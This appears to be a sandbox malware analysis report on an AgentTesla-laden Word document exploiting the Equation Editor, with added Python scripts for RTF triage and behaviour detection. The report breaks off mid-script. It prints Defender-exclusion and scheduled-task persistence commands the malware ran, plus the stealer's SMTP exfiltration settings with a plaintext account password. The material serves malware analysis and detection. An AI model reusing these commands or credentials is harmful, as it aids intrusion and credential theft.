Windows Analysis Report
Scan 368 1.doc

Overview

General Information

Sample name: Scan 368 1.doc
Analysis ID: 1427899
MD5: f22c33e0af52d382e821ff26fe23f30b
SHA1: 15bdcdd580cbb66c67d8fd90151e25fc285f7de3
SHA256: 50297c7705e690b43057219bc9a89cfb49e6d739742bbf4d904b64832b1cfefc
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2736 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2152 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obimohohj75.scr (PID: 3128 cmdline: "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: A1B496997BE52302CB008BB93FABCFBF)
        • powershell.exe (PID: 3212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • obimohohj75.scr (PID: 3512 cmdline: "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: A1B496997BE52302CB008BB93FABCFBF)
    • EQNEDT32.EXE (PID: 3140 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3452 cmdline: taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • pgZzUFYKXcIRkU.exe (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe MD5: A1B496997BE52302CB008BB93FABCFBF)
      • powershell.exe (PID: 3612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3792 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • pgZzUFYKXcIRkU.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: A1B496997BE52302CB008BB93FABCFBF)
      • pgZzUFYKXcIRkU.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: A1B496997BE52302CB008BB93FABCFBF)
Malware family: Agent Tesla (AgentTesla)
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}
Yara matches on the submitted file
Source: Scan 368 1.doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with a non-standard version header that embed one of the objects mostly observed in exploit documents. | Author: ditekSHen
Strings:
  • 0x1afd1:$obj2: \objdata
  • 0x1afeb:$obj3: \objupdate
  • 0x1afae:$obj4: \objemb
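The YARA hit above keys on two traits of the RTF carrier: a header that is not the standard {\rtf1, and the object control words \objemb, \objupdate and \objdata. \objupdate is the one that matters operationally, because it makes Word update the embedded object as the document is opened, which is what starts the object's COM server (here EQNEDT32.EXE) without any user interaction. The script below is an added example, not code from this report or from the rule's author, and its rule logic is an assumption about how INDICATOR_RTF_MalVer_Objects is written. It locates those control words with their offsets, hex-decodes the \objdata group and parses the OLE1 object header to recover the class name, which tells you which server the document will launch before you ever detonate it. The sample RTF is constructed inline; its native data is a placeholder string, not exploit content.

```python
"""RTF triage for the traits the INDICATOR_RTF_MalVer_Objects rule keys on.

Added example, not code from the Joe Sandbox report or from the rule's author.
Assumed rule logic: a header other than the standard '{\\rtf1' together with
one of the object control words \\objdata, \\objupdate or \\objemb. The sample
document is constructed below; its \\objdata payload is a placeholder string.
"""
import re
import struct
from typing import Dict, List, Optional

STANDARD_HEADER = b"{\\rtf1"
OBJECT_WORDS = (b"\\objdata", b"\\objupdate", b"\\objemb", b"\\objclass")

def header_kind(data: bytes) -> str:
    """'standard' for '{\\rtf1'; 'malformed' for the '{\\rt...' variants Word still opens."""
    head = data.lstrip()[:6]
    if head.startswith(STANDARD_HEADER):
        return "standard"
    return "malformed" if head.startswith(b"{\\rt") else "not-rtf"

def control_word_offsets(data: bytes) -> Dict[str, List[int]]:
    """Offsets of every object-related control word, like the $obj strings in the YARA hit."""
    hits: Dict[str, List[int]] = {}
    for word in OBJECT_WORDS:
        offs = [m.start() for m in re.finditer(re.escape(word) + rb"\b", data)]
        if offs:
            hits[word.decode()] = offs
    return hits

def objdata_groups(data: bytes) -> List[bytes]:
    """Raw content of each {\\*\\objdata ...} group, delimited by brace matching."""
    groups = []
    for m in re.finditer(rb"\\objdata\b", data):
        depth, i = 1, m.end()
        while i < len(data) and depth:
            depth += {b"{": 1, b"}": -1}.get(data[i:i + 1], 0)
            i += 1
        groups.append(data[m.end():i - 1])
    return groups

def decode_objdata(group: bytes) -> bytes:
    """Hex-decode an \\objdata group. Non-hex bytes are dropped, which mirrors the
    leniency of Word's RTF reader and defeats the junk-insertion obfuscation that
    exploit documents use to break naive parsers."""
    hexdigits = re.sub(rb"[^0-9A-Fa-f]", b"", group)
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    return bytes.fromhex(hexdigits.decode("ascii"))

def parse_ole1_object(blob: bytes) -> Optional[Dict[str, object]]:
    """Parse the OLE1 ObjectHeader carried by \\objdata: OLEVersion, FormatID,
    ClassName, TopicName, ItemName (all length-prefixed), NativeDataSize, NativeData."""
    try:
        version, format_id, name_len = struct.unpack_from("<III", blob, 0)
        if version != 0x00000501 or format_id != 2:    # FormatID 2 = embedded object
            return None
        off = 12
        class_name = blob[off:off + name_len].rstrip(b"\0").decode("ascii", "replace")
        off += name_len
        for _ in range(2):                             # skip TopicName and ItemName
            (length,) = struct.unpack_from("<I", blob, off)
            off += 4 + length
        (native_size,) = struct.unpack_from("<I", blob, off)
        off += 4
    except struct.error:                               # truncated or not OLE1 at all
        return None
    return {"class_name": class_name, "native_size": native_size,
            "native_data": blob[off:off + native_size],
            # Equation.3 is served by EQNEDT32.EXE, the process this report shows being exploited
            "equation_editor": "equation" in class_name.lower()}

def triage(data: bytes) -> Dict[str, object]:
    """One verdict in the spirit of the YARA rule, plus what the embedded object would launch."""
    words = control_word_offsets(data)
    objects = [o for o in (parse_ole1_object(decode_objdata(g)) for g in objdata_groups(data)) if o]
    header = header_kind(data)
    suspicious = header == "malformed" and any(w in words for w in ("\\objdata", "\\objupdate", "\\objemb"))
    return {"header": header, "control_words": words, "objects": objects, "suspicious": suspicious}

def build_sample_rtf() -> bytes:
    """Constructed sample: '{\\rt' header and an embedded Equation.3 object whose
    native data is a placeholder string (no MTEF stream, no shellcode)."""
    class_name = b"Equation.3\0"
    native = b"CONSTRUCTED-PLACEHOLDER-NOT-MTEF"
    blob = (struct.pack("<III", 0x00000501, 2, len(class_name)) + class_name
            + struct.pack("<II", 0, 0)             # empty TopicName and ItemName
            + struct.pack("<I", len(native)) + native)
    hexblob = blob.hex().encode("ascii")
    lines = b"\n".join(hexblob[i:i + 32] for i in range(0, len(hexblob), 32))
    return (b"{\\rt\\ansi\\deff0\n"
            b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
            b"{\\*\\objdata \n" + lines + b"\n}}\n}")

if __name__ == "__main__":
    result = triage(build_sample_rtf())
    print(result["header"], result["suspicious"], sorted(result["control_words"]))
    for obj in result["objects"]:
        print(obj["class_name"], obj["native_size"], obj["equation_editor"])
```

Run it on a real sample with triage(open(path, "rb").read()); the native_data of a recovered Equation.3 object is the MTEF stream the exploit lives in, which is what you would hand to a disassembler or to a dedicated CVE-2017-11882 decoder next. The header test alone is a weak signal (some generators emit odd headers), which is why the verdict requires an object control word as well, matching the rule's conjunction.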
Yara matches in memory dumps
Source: 00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(6 further entries are collapsed in the original report)
Yara matches in unpacked PE files
Source: 5.2.obimohohj75.scr.35e1930.5.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 5.2.obimohohj75.scr.35e1930.5.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 5.2.obimohohj75.scr.35e1930.5.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Strings:
  • 0x31671:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x316e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3176d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x317ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31869:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x318db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31971:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a01:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 5.2.obimohohj75.scr.361c350.6.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 5.2.obimohohj75.scr.361c350.6.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
(10 further entries are collapsed in the original report)

                    System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 172.67.175.222, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2152, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obimohohj75.scr, NewProcessName: C:\Users\user\AppData\Roaming\obimohohj75.scr, OriginalFileName: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3128, ProcessName: obimohohj75.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Users\user\AppData\Roaming\obimohohj75.scr, QueryName: api.ipify.org
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3212, TargetFilename: C:\Users\user\AppData\Local\Temp\5nap3g1o.oc0.ps1

                    Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe
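The process tree and the Sigma matches above describe a single chain: WINWORD.EXE starts EQNEDT32.EXE, which opens a TLS connection, writes a .scr into the Temporary Internet Files cache and starts the copy in AppData\Roaming; that process then adds Defender exclusions with Add-MpPreference, registers a scheduled task from an XML file in Temp and looks up the host's public IP at api.ipify.org. The script below is an added example, not the Sigma rules the report names and not Joe Security code. It encodes each of those behaviours as a small rule over Sysmon-style events, runs them over events built from the values in this report (plus three constructed benign events as controls), and attaches the process ancestry to every alert so the seven hits read as one chain rather than seven isolated detections.

```python
"""Rules for the behaviour chain in this report, run over constructed Sysmon-style events.

Added example; not the Sigma rules the report names and not Joe Security code. The
malicious events copy values from the process tree and Sigma sections above; PIDs
4001-4003 are constructed benign controls that the rules must not fire on.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

@dataclass
class Event:
    kind: str                       # "process", "network", "file" or "dns"
    pid: int
    image: str
    cmdline: str = ""
    parent_pid: Optional[int] = None
    parent_image: str = ""
    target: str = ""                # file path, "ip:port" or DNS query name

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "regsvr32.exe", "rundll32.exe", "schtasks.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
IP_LOOKUP_DOMAINS = {"api.ipify.org", "ipinfo.io", "icanhazip.com", "checkip.amazonaws.com"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def suspicious_office_child(e: Event) -> bool:
    """Office or Equation Editor spawning a LOLBin, or anything from a user-writable directory."""
    return (e.kind == "process" and basename(e.parent_image) in OFFICE_PARENTS
            and (basename(e.image) in LOLBINS or any(d in e.image.lower() for d in USER_WRITABLE)))

def equation_editor_started(e: Event) -> bool:
    """EQNEDT32.EXE was removed by the January 2018 Office updates; any start is worth a look."""
    return e.kind == "process" and basename(e.image) == "eqnedt32.exe"

def equation_editor_network(e: Event) -> bool:
    """An equation editor has no business opening sockets."""
    return e.kind == "network" and basename(e.image) == "eqnedt32.exe"

def powershell_defender_exclusion(e: Event) -> bool:
    """Add-/Set-MpPreference with any -Exclusion* parameter on the plain command line."""
    cl = e.cmdline.lower()
    return e.kind == "process" and basename(e.image) == "powershell.exe" and "mppreference" in cl and "-exclusion" in cl

def schtasks_xml_from_temp(e: Event) -> bool:
    """schtasks /Create fed a task definition that lives in the user's Temp folder."""
    cl = e.cmdline.lower()
    return (e.kind == "process" and basename(e.image) == "schtasks.exe"
            and "/create" in cl and "/xml" in cl and "\\appdata\\local\\temp\\" in cl)

def scr_written_outside_system32(e: Event) -> bool:
    """A .scr is a PE; one written anywhere but System32 is a dropper tell."""
    t = e.target.lower()
    return e.kind == "file" and t.endswith(".scr") and "\\windows\\system32\\" not in t

def ip_lookup_from_non_browser(e: Event) -> bool:
    return e.kind == "dns" and e.target.lower() in IP_LOOKUP_DOMAINS and basename(e.image) not in BROWSERS

RULES: Dict[str, Callable[[Event], bool]] = {f.__name__: f for f in (
    suspicious_office_child, equation_editor_started, equation_editor_network,
    powershell_defender_exclusion, schtasks_xml_from_temp,
    scr_written_outside_system32, ip_lookup_from_non_browser)}

def ancestry(pid: int, procs: Dict[int, Event]) -> str:
    """Walk parent links; the root (WINWORD.EXE here) is known only from its child's ParentImage."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        e = procs[pid]
        chain.append(basename(e.image))
        if e.parent_pid is not None and e.parent_pid not in procs and e.parent_image:
            chain.append(basename(e.parent_image))
        pid = e.parent_pid
    return " > ".join(reversed(chain))

def run_rules(events: List[Event]) -> List[Dict[str, object]]:
    """Evaluate every rule against every event; each alert carries the process ancestry."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    return [{"rule": name, "pid": e.pid, "chain": ancestry(e.pid, procs)}
            for e in events for name, rule in RULES.items() if rule(e)]

WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SCR = r"C:\Users\user\AppData\Roaming\obimohohj75.scr"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("process", 2152, EQN, '"' + EQN + '" -Embedding', 2736, WORD),
    Event("network", 2152, EQN, target="172.67.175.222:443"),
    Event("file", 2152, EQN, target=r"C:\Users\user\AppData\Local\Microsoft\Windows"
                                   r"\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr"),
    Event("process", 3128, SCR, '"' + SCR + '"', 2152, EQN),
    Event("dns", 3128, SCR, target="api.ipify.org"),
    Event("process", 3212, PS, 'powershell.exe Add-MpPreference -ExclusionPath "' + SCR + '"', 3128, SCR),
    Event("process", 3292, r"C:\Windows\SysWOW64\schtasks.exe",
          r'schtasks.exe /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"',
          3128, SCR),
    # constructed benign controls: printing helper, a read-only Defender query, a browser IP lookup
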